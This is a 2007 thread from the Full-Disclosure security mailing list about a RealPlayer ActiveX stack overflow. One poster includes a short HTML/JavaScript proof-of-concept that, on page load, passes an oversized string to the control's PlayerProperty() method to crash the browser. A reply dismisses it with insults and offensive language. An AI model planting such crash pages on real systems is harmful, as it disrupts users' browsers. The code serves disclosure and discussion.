LOLOLOLOL ok you win, client side denial of service warrants your 5
electronic mail messages with up to the minute updates. I bet this
one will be exploited in the wild!
Get a life LOLOL!
J
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
<elazarb@earthlink.net> wrote:
"Stack Overflow" - learn to read. A DoS attack still has some
security implications...
-----Original Message-----
From: Joey Mengele <joey.mengele@hushmail.com>
Sent: Nov 27, 2007 1:05 AM
To: full-disclosure@lists.grok.org.uk, elazarb@earthlink.net
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer
ierpplug.dll ActiveX Control Multiple Stack Overflows
Holy mother of Hitler will you shut the fuck up already. This is
a
"stack overflow" not a "stack based buffer overflow". There are
no
security implications here. You are worse than Jewha Mati Laurio.
Elazar, please do not post to this list again. Please leave the
trolling to the professionals.
J
P.S. Sorry for the swear words John.
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
<elazarb@earthlink.net> wrote:
After some creative Googling, I am revising my original post. I
believe that the Import() method overflow that I originally
posted
is really http://www.securityfocus.com/bid/26130, although I am
not sure why Linux is listed under the "Vulnerable" section, so
I
am taking it out of the PoC code. Real claims to have patched
this
back in October, but I can still throw a stack overflow
exception
via this function using the originally stated version of
RealPlayer(which I installed last night). I am now listing this
vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX
Control PlayerProperty() Method Stack Overflow, and it might be
wise to list this under a separate BID. PoC as follows:
-------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-
4070-4B92-A0EA-D9994BCC0DC5}
var obj2 = obj.PlayerProperty(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
-------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF
rqMryjXVt31vg2H7tNd/
--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
